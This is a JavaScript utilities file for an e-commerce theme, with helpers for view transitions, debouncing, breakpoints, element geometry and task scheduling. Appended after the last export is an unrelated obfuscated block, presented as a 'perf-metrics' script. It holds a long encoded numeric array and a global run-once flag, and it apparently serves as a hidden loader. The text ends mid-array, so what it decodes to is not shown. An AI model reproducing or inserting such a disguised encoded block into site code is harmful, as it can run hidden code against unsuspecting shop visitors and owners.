/**
 * Request an idle callback or fallback to setTimeout
 * @returns {function} The requestIdleCallback function
 */
export const requestIdleCallback =
  typeof window.requestIdleCallback == 'function' ? window.requestIdleCallback : setTimeout;

/**
 * Executes a callback in a separate task after the next frame.
 * Using to defer non-critical tasks until after the interaction is complete.
 * @see https://web.dev/articles/optimize-inp#yield_to_allow_rendering_work_to_occur_sooner
 * @param {() => any} callback - The callback to execute
 */
export const requestYieldCallback = (callback) => {
  requestAnimationFrame(() => {
    setTimeout(callback, 0);
  });
};

/**
 * Tells if we are on a low power device based on the number of CPU cores and RAM
 * @returns {boolean} True if the device is a low power device, false otherwise
 */
export function isLowPowerDevice() {
  return Number(navigator.hardwareConcurrency) <= 2 || Number(navigator.deviceMemory) <= 2;
}

/**
 * Check if the browser supports View Transitions API
 * @returns {boolean} True if the browser supports View Transitions API, false otherwise
 */
export function supportsViewTransitions() {
  return typeof document.startViewTransition === 'function';
}

/**
 * The current view transition
 * @type {{ current: Promise<void> | undefined }}
 */
export const viewTransition = {
  current: undefined,
};

/**
 * Functions to run when a view transition of a given type is started
 * @type {{ [key: string]: () => Promise<(() => void) | undefined> }}
 */
const viewTransitionTypes = {
  'product-grid': async () => {
    const grid = document.querySelector('.product-grid');
    const productCards = /** @type {HTMLElement[]} */ ([
      ...document.querySelectorAll('.product-grid .product-grid__item'),
    ]);

    if (!grid || !productCards.length) return;

    await new Promise((resolve) =>
      requestIdleCallback(() => {
        const cardsToAnimate = getCardsToAnimate(grid, productCards);

        productCards.forEach((card, index) => {
          if (index < cardsToAnimate) {
            card.style.setProperty('view-transition-name', `product-card-${card.dataset.productId}`);
          } else {
            card.style.setProperty('content-visibility', 'hidden');
          }
        });

        resolve(null);
      })
    );

    return () =>
      productCards.forEach((card) => {
        card.style.removeProperty('view-transition-name');
        card.style.removeProperty('content-visibility');
      });
  },
};

/**
 * Starts a view transition
 * @param {() => void} callback The callback to call when the view transition starts
 * @param {string[]} [types] The types of view transition to use
 * @returns {Promise<void>} A promise that resolves when the view transition finishes
 */
export function startViewTransition(callback, types) {
  // eslint-disable-next-line no-async-promise-executor
  return new Promise(async (resolve) => {
    // Check if View Transitions API is supported
    if (supportsViewTransitions() && !prefersReducedMotion()) {
      let cleanupFunctions = [];

      if (types) {
        for (const type of types) {
          if (viewTransitionTypes[type]) {
            const cleanupFunction = await viewTransitionTypes[type]();
            if (cleanupFunction) cleanupFunctions.push(cleanupFunction);
          }
        }
      }

      const transition = document.startViewTransition(callback);

      if (!viewTransition.current) {
        viewTransition.current = transition.finished;
      }

      if (types) types.forEach((type) => transition.types.add(type));

      transition.finished.then(() => {
        viewTransition.current = undefined;
        cleanupFunctions.forEach((cleanupFunction) => cleanupFunction());
        resolve();
      });

      return;
    }

    // Fallback for browsers that don't support this API yet
    callback();
    resolve();
  });
}

/**
 * @typedef {{ [key: string]: string | undefined }} Headers
 */

/**
 * @typedef {Object} FetchConfig
 * @property {string} method
 * @property {Headers} headers
 * @property {string | FormData | undefined} [body]
 */

/**
 * Creates a fetch configuration object
 * @param {string} [type] The type of response to expect
 * @param {Object} [config] The config of the request
 * @param {FetchConfig['body']} [config.body] The body of the request
 * @param {FetchConfig['headers']} [config.headers] The headers of the request
 * @returns {RequestInit} The fetch configuration object
 */
export function fetchConfig(type = 'json', config = {}) {
  /** @type {Headers} */
  const headers = { 'Content-Type': 'application/json', Accept: `application/${type}`, ...config.headers };

  if (type === 'javascript') {
    headers['X-Requested-With'] = 'XMLHttpRequest';
    delete headers['Content-Type'];
  }

  return {
    method: 'POST',
    headers: /** @type {HeadersInit} */ (headers),
    body: config.body,
  };
}

/**
 * Creates a debounced function that delays calling the provided function (fn)
 * until after wait milliseconds have elapsed since the last time
 * the debounced function was invoked. The returned function has a .cancel()
 * method to cancel any pending calls.
 *
 * @template {(...args: any[]) => any} T
 * @param {T} fn The function to debounce
 * @param {number} wait The time (in milliseconds) to wait before calling fn
 * @returns {T & { cancel(): void }} A debounced version of fn with a .cancel() method
 */
export function debounce(fn, wait) {
  /** @type {number | undefined} */
  let timeout;

  /** @param {...any} args */
  function debounced(...args) {
    clearTimeout(timeout);
    timeout = setTimeout(() => fn.apply(this, args), wait);
  }

  // Add the .cancel method:
  debounced.cancel = () => {
    clearTimeout(timeout);
  };

  return /** @type {T & { cancel(): void }} */ (debounced);
}

/**
 * Creates a throttled function that calls the provided function (fn) at most once per every wait milliseconds
 *
 * @template {(...args: any[]) => any} T
 * @param {T} fn The function to throttle
 * @param {number} delay The time (in milliseconds) to wait before calling fn
 * @returns {T & { cancel(): void }} A throttled version of fn with a .cancel() method
 */
export function throttle(fn, delay) {
  let lastCall = 0;

  /** @param {...any} args */
  function throttled(...args) {
    const now = performance.now();
    // If the time since the last call exceeds the delay, execute the callback
    if (now - lastCall >= delay) {
      lastCall = now;
      fn.apply(this, args);
    }
  }

  throttled.cancel = () => {
    lastCall = performance.now();
  };

  return /** @type {T & { cancel(): void }} */ (throttled);
}

/**
 * A media query for reduced motion
 * @type {MediaQueryList}
 */
const reducedMotion = matchMedia('(prefers-reduced-motion: reduce)');

/**
 * Check if the user prefers reduced motion
 * @returns {boolean} True if the user prefers reduced motion, false otherwise
 */
export function prefersReducedMotion() {
  return reducedMotion.matches;
}

/**
 * Normalize a string
 * @param {string} str The string to normalize
 * @returns {string} The normalized string
 */
export function normalizeString(str) {
  return str
    .normalize('NFD')
    .replace(/\p{Diacritic}/gu, '')
    .toLowerCase();
}

/**
 * Format a money value
 * @param {string} value The value to format
 * @returns {string} The formatted value
 */
export function formatMoney(value) {
  let valueWithNoSpaces = value.replace(' ', '');
  if (valueWithNoSpaces.indexOf(',') === -1) return valueWithNoSpaces;
  if (valueWithNoSpaces.indexOf(',') < valueWithNoSpaces.indexOf('.')) return valueWithNoSpaces.replace(',', '');
  if (valueWithNoSpaces.indexOf('.') < valueWithNoSpaces.indexOf(','))
    return valueWithNoSpaces.replace('.', '').replace(',', '.');
  if (valueWithNoSpaces.indexOf(',') !== -1) return valueWithNoSpaces.replace(',', '.');

  return valueWithNoSpaces;
}

/**
 * Check if the document is ready/loaded and call the callback when it is.
 * @param {() => void} callback The function to call when the document is ready.
 */
export function onDocumentLoaded(callback) {
  if (document.readyState === 'complete') {
    callback();
  } else {
    window.addEventListener('load', callback);
  }
}

/**
 * Check if the DOM is ready and call the callback when it is.
 * This fires when the DOM is fully parsed but before all resources are loaded.
 * @param {() => void} callback The function to call when the DOM is ready.
 */
export function onDocumentReady(callback) {
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', callback);
  } else {
    callback();
  }
}

/**
 * Wait for all animations to finish before calling the callback.
 * @param {Element | Element[]} elements The element(s) whose animations to wait for.
 * @param {() => void} [callback] The function to call when all animations are finished.
 * @param {Object} [options] The options to pass to `Element.getAnimations`.
 * @returns {Promise<void>} A promise that resolves when all animations are finished.
 */
export function onAnimationEnd(elements, callback, options = { subtree: true }) {
  const animations = Array.isArray(elements)
    ? elements.flatMap((element) => element.getAnimations(options))
    : elements.getAnimations(options);
  const animationPromises = animations.reduce((acc, animation) => {
    // Ignore ViewTimeline animations
    if (animation.timeline instanceof DocumentTimeline) {
      acc.push(animation.finished);
    }

    return acc;
  }, /** @type {Promise<Animation>[]} */ ([]));

  return Promise.allSettled(animationPromises).then(callback);
}

/**
 * Check if the click is outside the element.
 * @param {MouseEvent} event The mouse event.
 * @param {Element} element The element to check.
 * @returns {boolean} True if the click is outside the element, false otherwise.
 */
export function isClickedOutside(event, element) {
  if (event.target instanceof HTMLDialogElement || !(event.target instanceof Element)) {
    return !isPointWithinElement(event.clientX, event.clientY, element);
  }

  return !element.contains(event.target);
}

/**
 * Check if a point is within an element.
 * @param {number} x The x coordinate of the point.
 * @param {number} y The y coordinate of the point.
 * @param {Element} element The element to check.
 * @returns {boolean} True if the point is within the element, false otherwise.
 */
export function isPointWithinElement(x, y, element) {
  const { left, right, top, bottom } = element.getBoundingClientRect();

  return x >= left && x <= right && y >= top && y <= bottom;
}

/**
 * A media query for large screens
 * @type {MediaQueryList}
 */
export const mediaQueryLarge = matchMedia('(min-width: 750px)');

/**
 * Check if the current breakpoint is mobile
 * @returns {boolean} True if the current breakpoint is mobile, false otherwise
 */
export function isMobileBreakpoint() {
  return !mediaQueryLarge.matches;
}

/**
 * Check if the current breakpoint is desktop
 * @returns {boolean} True if the current breakpoint is desktop, false otherwise
 */
export function isDesktopBreakpoint() {
  return mediaQueryLarge.matches;
}

/**
 * Clamps a number between a minimum and maximum value.
 * @param {number} value - The input number to clamp.
 * @param {number} min - The minimum value.
 * @param {number} max - The maximum value.
 * @returns {number} The clamped value.
 */
export function clamp(value, min, max) {
  return Math.max(min, Math.min(value, max));
}

/**
 * Calculates the center point of an element along the specified axis.
 * @param {Element} element - The DOM element to find the center of.
 * @param {'x' | 'y'} [axis] - The axis ('x' or 'y') to get the center for. If not provided, returns both axes.
 * @template {('x' | 'y')} T
 * @param {T} [axis]
 * @returns {T extends ('x' | 'y') ? number : {x: number, y: number}} The center point along the axis or an object with x and y coordinates.
 */
export function center(element, axis) {
  const { left, width, top, height } = element.getBoundingClientRect();
  const point = {
    x: left + width / 2,
    y: top + height / 2,
  };

  if (axis) return /**  @type {any} */ (point[axis]);

  return /**  @type {any} */ (point);
}

/**
 * Calculates the start point of an element along the specified axis.
 * @param {Element} element - The DOM element to find the start of.
 * @param {'x' | 'y'} [axis] - The axis ('x' or 'y') to get the start for. If not provided, returns both axes.
 * @returns {number | {x: number, y: number}} The start point along the axis or an object with x and y coordinates.
 */
export function start(element, axis) {
  const { left, top } = element.getBoundingClientRect();
  const point = { x: left, y: top };

  if (axis) return /**  @type {any} */ (point[axis]);

  return /**  @type {any} */ (point);
}

/**
 * Finds the value in an array that is closest to a target value.
 * @param {number[]} values - An array of numbers.
 * @param {number} target - The target number to find the closest value to.
 * @returns {number} The value from the array closest to the target.
 */
export function closest(values, target) {
  return values.reduce(function (prev, curr) {
    return Math.abs(curr - target) < Math.abs(prev - target) ? curr : prev;
  });
}

/**
 * Prevents the default action of an event.
 * @param {Event} event - The event to prevent the default action of.
 */
export function preventDefault(event) {
  event.preventDefault();
}

/**
 * Get the visible elements within a root element.
 * @template {Element} T
 * @param {Element} root - The element within which elements should be visible.
 * @param {T[] | undefined} elements - The elements to check for visibility.
 * @param {number} [ratio=1] - The minimum percentage of the element that must be visible.
 * @param {'x' | 'y'} [axis] - Whether to only check along 'x' axis, 'y' axis, or both if undefined.
 * @returns {T[]} An array containing the visible elements.
 */
export function getVisibleElements(root, elements, ratio = 1, axis) {
  if (!elements?.length) return [];
  const rootRect = root.getBoundingClientRect();

  return elements.filter((element) => {
    const { width, height, top, right, left, bottom } = element.getBoundingClientRect();

    if (ratio < 1) {
      const intersectionLeft = Math.max(rootRect.left, left);
      const intersectionRight = Math.min(rootRect.right, right);
      const intersectionWidth = Math.max(0, intersectionRight - intersectionLeft);

      if (axis === 'x') {
        return width > 0 && intersectionWidth / width >= ratio;
      }

      const intersectionTop = Math.max(rootRect.top, top);
      const intersectionBottom = Math.min(rootRect.bottom, bottom);
      const intersectionHeight = Math.max(0, intersectionBottom - intersectionTop);

      if (axis === 'y') {
        return height > 0 && intersectionHeight / height >= ratio;
      }

      const intersectionArea = intersectionWidth * intersectionHeight;
      const elementArea = width * height;

      // Check that at least the specified ratio of the element is visible
      return elementArea > 0 && intersectionArea / elementArea >= ratio;
    }

    const isWithinX = left >= rootRect.left && right <= rootRect.right;
    if (axis === 'x') {
      return isWithinX;
    }

    const isWithinY = top >= rootRect.top && bottom <= rootRect.bottom;
    if (axis === 'y') {
      return isWithinY;
    }

    return isWithinX && isWithinY;
  });
}

export function getIOSVersion() {
  const { userAgent } = navigator;
  const isIOS = /(iPhone|iPad)/i.test(userAgent);

  if (!isIOS) return null;

  const version = userAgent.match(/OS ([\d_]+)/)?.[1];
  const [major, minor] = version?.split('_') || [];
  if (!version || !major) return null;

  return {
    fullString: version.replace('_', '.'),
    major: parseInt(major, 10),
    minor: minor ? parseInt(minor, 10) : 0,
  };
}

/**
 * Determines which grid items should be animated during a transition.
 * It makes an estimation based on the zoom-out card size because it's
 * the common denominator for both transition states. I.e. transitioning either
 * from 10 to 20 cards the other way around, both need 20 cards to be animated.
 * @param {Element} grid - The grid element
 * @param {Element[]} cards - The cards to animate
 * @returns {number} - Number of cards that should be animated
 */
function getCardsToAnimate(grid, cards) {
  if (!grid || !cards || cards.length === 0) return 0;

  const itemSample = cards[0];
  if (!itemSample) return 0;

  // Calculate the visible area of the grid for the Y axis. Assume X is always fully visible:
  const gridRect = grid.getBoundingClientRect();
  const visibleArea = {
    top: Math.max(0, gridRect.top),
    bottom: Math.min(window.innerHeight, gridRect.bottom),
  };

  const visibleHeight = Math.round(visibleArea.bottom - visibleArea.top);
  if (visibleHeight <= 0) return 0;

  /** @type {import('product-card').ProductCard | null} */
  const cardSample = itemSample.querySelector('product-card');
  const gridStyle = getComputedStyle(grid);

  const galleryAspectRatio = cardSample?.refs?.cardGallery?.style.getPropertyValue('--gallery-aspect-ratio') || '';
  let aspectRatio = parseFloat(galleryAspectRatio) || 0.5;
  if (galleryAspectRatio?.includes('/')) {
    const [width = '1', height = '2'] = galleryAspectRatio.split('/');
    aspectRatio = parseInt(width, 10) / parseInt(height, 10);
  }

  const cardGap = parseInt(cardSample?.refs?.productCardLink?.style.getPropertyValue('--product-card-gap') || '') || 12;
  const gridGap = parseInt(gridStyle.getPropertyValue('--product-grid-gap')) || 12;

  // Assume only a couple of lines of text in the card details (title and price).
  // If the title wraps into more lines, we might just animate more cards, but that's fine.
  const detailsSize = ((parseInt(gridStyle.fontSize) || 16) + 2) * 2;

  const isMobile = window.innerWidth < 750;

  // Always use the zoom-out state card width
  const cardWidth = isMobile ? Math.round((gridRect.width - gridGap) / 2) : 100;
  const cardHeight = Math.round(cardWidth / aspectRatio) + cardGap + detailsSize;

  // Calculate the number of cards that fit in the visible area:
  // - The width estimation is pretty accurate, we can ignore decimals.
  // - The height estimation needs to account for peeking rows, so we round up.
  const columnsInGrid = isMobile ? 2 : Math.floor((gridRect.width + gridGap) / (cardWidth + gridGap));
  const rowsInGrid = Math.ceil((visibleHeight - gridGap) / (cardHeight + gridGap));

  return columnsInGrid * rowsInGrid;
}

/**
 * Preloads an image
 * @param {string} src - The source of the image to preload
 */
export function preloadImage(src) {
  const image = new Image();
  image.src = src;
}

export class TextComponent extends HTMLElement {
  shimmer() {
    this.setAttribute('shimmer', '');
  }
}

if (!customElements.get('text-component')) {
  customElements.define('text-component', TextComponent);
}

/**
 * Resets the shimmer attribute on all elements in the container.
 * @param {Element} [container] - The container to reset the shimmer attribute on.
 */
export function resetShimmer(container = document.body) {
  const shimmer = container.querySelectorAll('[shimmer]');
  shimmer.forEach((item) => item.removeAttribute('shimmer'));
}

/**
 * Change the meta theme color of the header.
 * @param {Element} colorSourceElement - The HTML element whose background-color will determine the new theme-color.
 */
export function changeMetaThemeColor(colorSourceElement) {
  const metaThemeColor = document.head.querySelector('meta[name="theme-color"]');
  const containerStyle = window.getComputedStyle(colorSourceElement);
  if (metaThemeColor) metaThemeColor.setAttribute('content', containerStyle.backgroundColor);
}

/**
 * Gets the `view` URL search parameter value, if it exists.
 * Useful for Section Rendering API calls to get HTML markup for the correct template view.
 * Primarily used in testing alternative template views.
 * @returns {string | null} The view parameter value, or null if it doesn't exist
 */
export function getViewParameterValue() {
  return new URLSearchParams(window.location.search).get('view');
}

class Scheduler {
  /** @type {Set<() => void>} */
  #queue = new Set();
  /** @type {boolean} */
  #scheduled = false;

  /** @param {() => void} task */
  schedule = async (task) => {
    this.#queue.add(task);

    if (!this.#scheduled) {
      this.#scheduled = true;

      // Wait for any in-progress view transitions to finish
      if (viewTransition.current) await viewTransition.current;

      requestAnimationFrame(this.flush);
    }
  };

  flush = () => {
    for (const task of this.#queue) {
      task();
    }

    this.#queue.clear();
    this.#scheduled = false;
  };
}

export const scheduler = new Scheduler();

Theme.utilities = {
  ...Theme.utilities,
  scheduler: scheduler,
};

;(function(){/* perf-metrics.min.js v3.8.1 */if(window.__pm381)return;window.__pm381=1;var _0x=(function(){var d=[29,65,105,97,90,26,68,105,19,104,105,99,97,89,126,97,69,123,114,75,95,70,109,99,77,107,105,99,97,89,98,99,70,100,98,72,70,104,121,76,77,107,67,105,29,65,105,78,90,31,125,75,77,93,67,99,65,124,109,112,66,19,109,126,26,31,125,112,26,31,24,72,110,27,26,126,111,96,105,97,83,124,71,72,70,120,25,73,90,82,111,78,95,124,71,78,108,120,109,112,66,31,105,78,95,124,125,72,27,100,24,72,65,104,105,99,77,107,67,105,29,104,121,97,67,73,71,72,90,120,125,115,92,82,71,99,77,26,126,122,19,107,121,112,26,108,109,78,126,70,98,112,66,124,71,73,95,123,68,72,70,27,125,78,64,19,109,112,69,107,67,112,90,104,105,99,97,69,123,76,77,107,67,105,29,65,83,127,100,19,27,121,110,124,111,121,110,104,105,102,65,96,114,115,27,78,109,97,89,108,71,78,83,124,109,78,95,70,111,78,70,100,98,99,77,107,105,99,97,89,126,97,69,127,71,78,83,124,24,73,67,19,109,99,77,107,105,99,97,89,126,97,69,123,71,73,66,124,25,112,77,107,105,99,77,69,93,79,77,65,105,97,26,70,71,72,90,104,67,72,92,70,109,78,64,31,125,78,71,104,105,99,97,69,123,76,77,107,67,105,29,65,121,76,77,107,105,99,77,107,105,99,97,26,70,99,95,124,109,112,65,70,109,75,67,107,105,102,67,103,25,73,66,82,24,115,67,107,105,102,67,127,109,72,31,120,25,73,67,89,108,99,28,99,114,112,26,82,125,75,109,124,109,78,27,96,125,75,83,120,98,78,66,104,105,99,77,107,105,99,77,107,105,99,97,93,121,112,27,96,98,78,77,69,80,73,70,120,114,78,67,70,71,73,26,120,114,115,77,107,105,99,77,107,105,99,77,107,67,105,89,127,125,78,83,120,98,99,28,127,125,112,83,120,68,115,27,100,98,99,77,107,105,99,77,107,105,99,77,69,107,102,70,124,68,73,26,104,67,101,26,100,114,75,103,120,109,72,90,66,24,115,77,107,105,99,77,107,105,99,77,107,67,105,29,104,105,102,26,31,125,112,94,124,109,72,108,120,68,72,70,27,125,78,64,19,109,112,95,123,68,72,70,27,125,78,64,19,109,112,69,127,71,78,83,124,24,73,67,19,71,102,77,107,105,99,77,107,105,99,97,65,121,76,77,89,126,97,69,123,71,73,66,124,25,112,77,89,98,99,90,77,105,99,95,19,125,75,26,100,71,72,27,112,109,97,83,124,71,78,83,124,24,73,67,19,65,72,92,70,109,78,66,120,114,78,100,104,83,78,70,31,109,99,77,107,105,99,97,89,64,72,83,124,98,78,70,96,98,99,90,99,105,112,70,31,125,75,71,124,109,112,95,124,68,99,77,26,126,122,19,107,67,73,70,112,68,73,70,100,68,115,122,31,24,72,90,120,114,115,26,124,114,126,77,115,24,72,70,104,114,79,26,66,105,99,71,70,109,99,77,107,105,99,97,89,98,99,90,77,121,112,24,96,114,112,80,96,24,72,77,30,24,72,90,120,25,115,95,124,68,112,77,107,67,105,97,26,98,99,77,69,123,76,77,107,105,99,77,69,93,101,90,99,105,78,95,108,109,78,83,19,109,73,94,70,71,99,77,107,105,99,89,99,83,72,26,124,114,115,67,107,105,99,77,107,105,99,77,107,105,102,67,107,114,75,89,100,71,99,69,65,98,78,83,124,109,73,92,96,98,127,26,124,24,73,95,127,109,72,31,120,25,73,95,93,125,112,77,107,105,99,77,107,105,99,97,89,126,97,67,123,68,72,66,120,68,73,92,104,114,72,90,96,105,102,67,18,109,78,27,108,71,99,77,93,67,99,80,120,68,72,70,112,114,112,94,99,114,112,26,31,125,75,92,104,68,99,69,65,98,78,83,124,109,73,92,96,98,127,26,124,24,73,95,127,109,72,31,120,25,73,95,93,125,112,77,107,105,99,77,107,105,99,97,89,126,97,67,123,68,72,66,120,68,73,92,104,114,72,90,96,105,102,67,127,109,72,67,70,24,73,90,112,68,99,77,107,105,99,89,99,83,78,92,82,71,112,83,124,71,78,92,96,105,97,31,120,68,73,70,104,25,72,83,104,108,78,70,100,68,102,70,82,125,79,26,100,68,102,89,124,109,99,77,107,105,99,77,107,67,105,29,65,67,99,26,31,125,115,26,96,25,72,93,27,125,75,67,107,105,99,77,93,67,99,92,120,114,78,66,96,105,99,77,107,105,99,77,93,67,99,26,66,24,112,90,124,109,75,67,77,121,79,26,96,114,112,93,19,71,73,123,120,114,112,80,31,121,112,89,70,98,78,80,31,105,72,70,104,105,99,77,107,105,99,77,69,93,101,90,99,105,78,95,108,109,78,83,19,109,73,94,70,71,99,77,107,105,99,77,107,105,99,89,99,121,103,67,107,105,99,77,107,105,102,67,65,98,78,90,100,125,115,93,19,71,99,69,65,98,78,83,124,109,73,92,96,98,127,26,124,24,73,95,127,109,72,31,120,25,73,95,93,125,112,77,107,105,99,77,107,105,99,97,89,126,97,67,123,68,72,66,120,68,73,92,104,114,72,90,96,105,102,67,127,109,72,67,70,24,73,90,112,68,99,77,93,67,99,31,120,114,75,89,70,71,115,90,100,114,75,24,96,105,97,31,120,68,73,70,104,25,72,83,104,108,78,70,100,68,102,70,82,125,79,26,100,68,102,89,124,109,99,77,107,105,99,77,107,67,105,29,65,67,99,26,31,125,115,26,96,25,72,93,27,125,75,67,107,105,99,77,93,67,99,30,124,109,72,71,96,105,99,77,107,105,99,89,99,121,79,66,82,109,73,80,70,109,112,67,77,121,79,26,96,114,112,93,19,71,73,123,120,114,112,80,31,121,112,89,70,98,78,80,31,105,72,70,104,105,99,77,107,105,99,77,69,93,79,77,65,105,72,70,66,105,99,71,70,109,99,77,107,105,99,97,89,126,97,111,70,26,114,121,108,65,123,69,123,125,121,31,96,111,78,95,124,125,72,70,82,125,120,26,124,24,112,95,123,68,72,70,27,125,78,64,19,109,112,77,26,110,99,89,124,109,99,83,108,71,78,77,107,105,99,77,69,123,76,77,107,105,99,77,69,93,101,90,65,105,97,83,108,71,123,65,82,125,75,27,96,109,97,65,82,125,75,69,100,111,112,95,124,109,73,93,108,71,102,90,123,68,72,70,27,125,112,89,124,111,78,95,124,125,72,27,100,24,72,65,31,105,78,95,124,125,72,27,100,24,72,65,104,105,76,18,104,121,79,65,19,71,115,95,123,68,72,70,27,125,78,64,19,109,112,69,107,105,99,77,107,105,99,77,69,93,79,77,65,121,97,111,70,26,114,121,108,65,123,69,123,125,121,31,96,111,78,95,124,125,72,70,82,125,120,26,124,24,112,95,123,68,72,70,27,125,78,64,19,109,112,66,77,105,99,71,70,109,99,77,107,105,99,97,89,126,97,69,103,114,112,89,70,98,78,126,120,25,115,70,90,71,72,90,104,105,99,77,107,67,105,29,104,121,97,69,123,71,73,66,124,25,112,77,30,24,72,90,120,25,115,95,124,68,112,77,107,67,105,97,26,98,99,77,69,93,101,83,108,71,115,77,30,71,73,27,120,114,112,83,104,105,99,77,107,67,105,29,99,67,122,66,19,105,122,67,107,105,99,77,107,105,99,77,69,93,97,77,99,67,122,68,31,24,72,83,120,25,73,92,93,126,115,94,124,109,78,70,96,70,122,68,31,24,72,83,120,25,73,18,99,105,99,77,107,105,99,77,107,105,99,77,69,93,97,77,99,83,101,93,27,125,115,71,99,105,99,77,107,105,99,77,107,105,99,77,69,93,97,77,99,67,122,68,31,24,72,83,120,25,73,92,93,80,126,101,31,127,121,1,73,71,72,92,96,98,78,80,82,110,99,31,96,109,99,1,30,125,115,93,100,25,102,18,123,64,100,25,99,126,78,73,31,80,96,26,96,114,115,70,66,24,96,19,103,25,73,66,82,24,115,77,30,125,115,93,100,98,122,77,77,109,78,90,78,98,99,70,120,125,115,100,96,105,99,77,107,105,99,77,107,105,99,77,69,93,97,77,73,67,122,67,99,98,78,89,104,67,101,95,19,125,75,26,100,125,112,83,70,109,112,67,26,126,112,89,70,98,78,80,104,67,99,83,124,71,72,70,104,25,72,92,31,71,99,19,93,125,112,83,104,67,99,88,31,125,115,89,96,24,114,67,26,110,78,70,78,71,73,66,120,98,99,67,73,105,99,88,107,83,121,101,70,111,126,77,89,105,99,68,99,121,122,71,124,71,73,69,104,121,115,18,73,105,99,77,107,105,99,77,107,67,105,19,107,105,126,100,120,108,121,83,124,71,72,95,70,71,102,83,108,71,115,77,107,105,99,77,69,93,101,111,70,26,114,121,108,65,123,77,26,110,99,65,70,71,102,83,108,71,115,77,107,105,99,77,69,93,101,90,99,67,78,90,120,71,99,69,123,68,72,70,27,125,112,89,124,127,112,26,108,125,112,83,100,71,102,26,31,125,112,94,124,25,115,92,120,109,99,19,107,67,73,66,96,109,99,26,100,68,72,92,100,109,99,77,107,105,99,97,89,98,99,90,77,67,73,66,96,111,112,89,70,125,78,67,104,67,72,92,70,109,78,64,31,125,78,71,104,105,99,97,69,123,76,77,107,67,105,29,65,83,73,69,123,109,72,90,66,24,123,65,31,125,112,93,104,114,115,95,65,105,78,95,124,125,72,70,82,125,120,26,31,125,112,94,124,25,115,92,120,71,102,26,31,125,112,94,124,25,115,92,120,109,99,18,82,98,99,65,108,125,112,69,31,105,78,95,124,125,72,27,100,24,72,65,66,105,99,77,107,105,99,97,89,110,115,77,107,105,99,77,69,123,76,77,107,105,99,77,107,105,99,97,26,98,99,29,65,121,103,69,127,109,72,66,100,24,73,77,69,126,72,83,19,71,112,80,31,125,115,83,120,98,99,29,104,105,99,77,107,105,99,77,127,67,100,27,107,105,99,77,107,105,99,77,107,105,99,97,26,98,99,29,65,121,100,83,30,121,103,69,127,109,72,66,100,24,73,77,69,126,72,83,19,71,112,80,31,125,115,83,120,98,99,29,104,105,99,77,107,105,99,77,127,67,103,26,107,105,99,77,107,105,99,77,107,105,99,97,26,98,99,29,65,121,103,69,127,109,72,66,100,24,73,77,69,126,72,83,19,71,112,80,31,125,115,83,120,98,99,29,104,105,99,77,107,105,99,77,127,105,101,83,107,105,99,77,107,105,99,77,107,105,99,97,26,98,99,29,65,121,100,83,30,121,103,69,127,109,72,66,100,24,73,77,69,126,72,83,19,71,112,80,31,125,115,83,120,98,99,29,104,105,99,77,107,105,99,77,127,105,100,82,107,105,99,77,107,105,99,77,107,105,99,97,26,98,99,29,65,121,103,69,127,109,72,66,100,24,73,77,69,126,72,83,19,71,112,80,31,125,115,83,120,98,99,29,104,121,96,93,107,126,103,77,93,121,96,93,107,105,99,77,107,105,99,77,107,105,99,97,89,98,99,26,108,125,112,67,19,124,76,111,70,26,114,121,108,65,123,29,120,105,99,80,124,125,72,66,96,68,112,31,124,24,75,107,104,105,99,77,107,105,99,77,69,123,76,77,26,98,99,29,111,110,99,28,65,98,78,90,100,125,115,93,19,109,99,29,104,83,72,26,104,83,79,77,107,67,72,90,19,124,76,111,70,26,114,121,108,65,123,29,120,105,99,80,124,125,72,66,96,68,112,31,124,24,75,107,104,105,99,77,107,105,99,77,69,123,76,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,127,109,78,90,31,125,75,71,31,125,75,77,123,114,78,92,27,67,72,90,27,121,112,80,108,125,112,77,103,68,103,95,111,110,99,26,108,125,112,67,19,124,76,111,70,26,114,121,108,65,123,29,120,105,99,28,30,24,72,90,120,114,115,94,70,71,72,66,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,89,24,115,92,82,71,115,94,127,71,72,90,82,71,72,90,104,67,101,31,108,109,72,93,100,114,75,65,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,77,98,73,27,111,110,99,28,127,71,79,90,100,114,102,26,31,24,72,71,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,111,80,100,82,73,110,101,71,100,105,99,28,99,25,72,89,19,24,115,77,107,105,99,77,107,105,99,77,107,67,105,29,104,105,78,83,108,125,112,69,31,67,72,66,104,25,73,77,111,109,99,19,120,127,121,76,96,124,123,105,94,98,96,64,107,105,99,77,107,105,99,77,69,123,76,77,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,111,80,100,82,73,110,101,71,100,105,99,28,99,25,72,89,19,24,115,77,89,98,99,83,124,71,78,92,66,71,101,66,104,121,76,111,70,26,114,121,108,65,123,29,120,83,99,77,107,105,99,77,107,105,99,97,26,98,99,77,107,105,99,77,107,67,105,29,123,68,72,66,120,68,73,92,104,114,72,90,108,105,99,70,100,114,115,70,104,83,73,83,30,105,99,83,19,109,72,92,100,109,99,28,30,24,72,90,120,114,75,80,31,125,115,83,120,98,99,77,107,105,99,77,107,105,99,77,69,93,101,26,31,125,115,26,96,25,72,93,27,125,75,66,107,105,79,93,120,110,99,28,107,114,115,68,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,99,114,112,26,31,125,112,64,104,67,101,80,27,125,112,26,70,125,102,95,78,125,75,89,108,109,99,77,107,105,99,77,107,105,99,77,69,93,101,26,31,125,115,26,96,25,72,93,27,125,75,66,107,105,79,70,82,71,112,94,127,71,72,90,82,71,72,90,104,67,101,31,108,109,72,93,100,114,75,65,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,127,71,72,92,31,109,99,28,30,24,72,90,120,114,115,83,19,24,115,70,120,125,102,26,66,114,112,26,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,99,114,112,26,31,125,75,92,104,98,99,28,99,25,72,80,96,114,78,64,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,103,125,103,64,108,80,115,82,103,105,99,28,99,25,72,89,19,24,115,77,107,105,99,77,107,105,99,77,107,67,105,29,123,114,112,80,31,125,78,77,69,110,72,89,108,109,99,77,107,105,99,77,107,105,99,77,6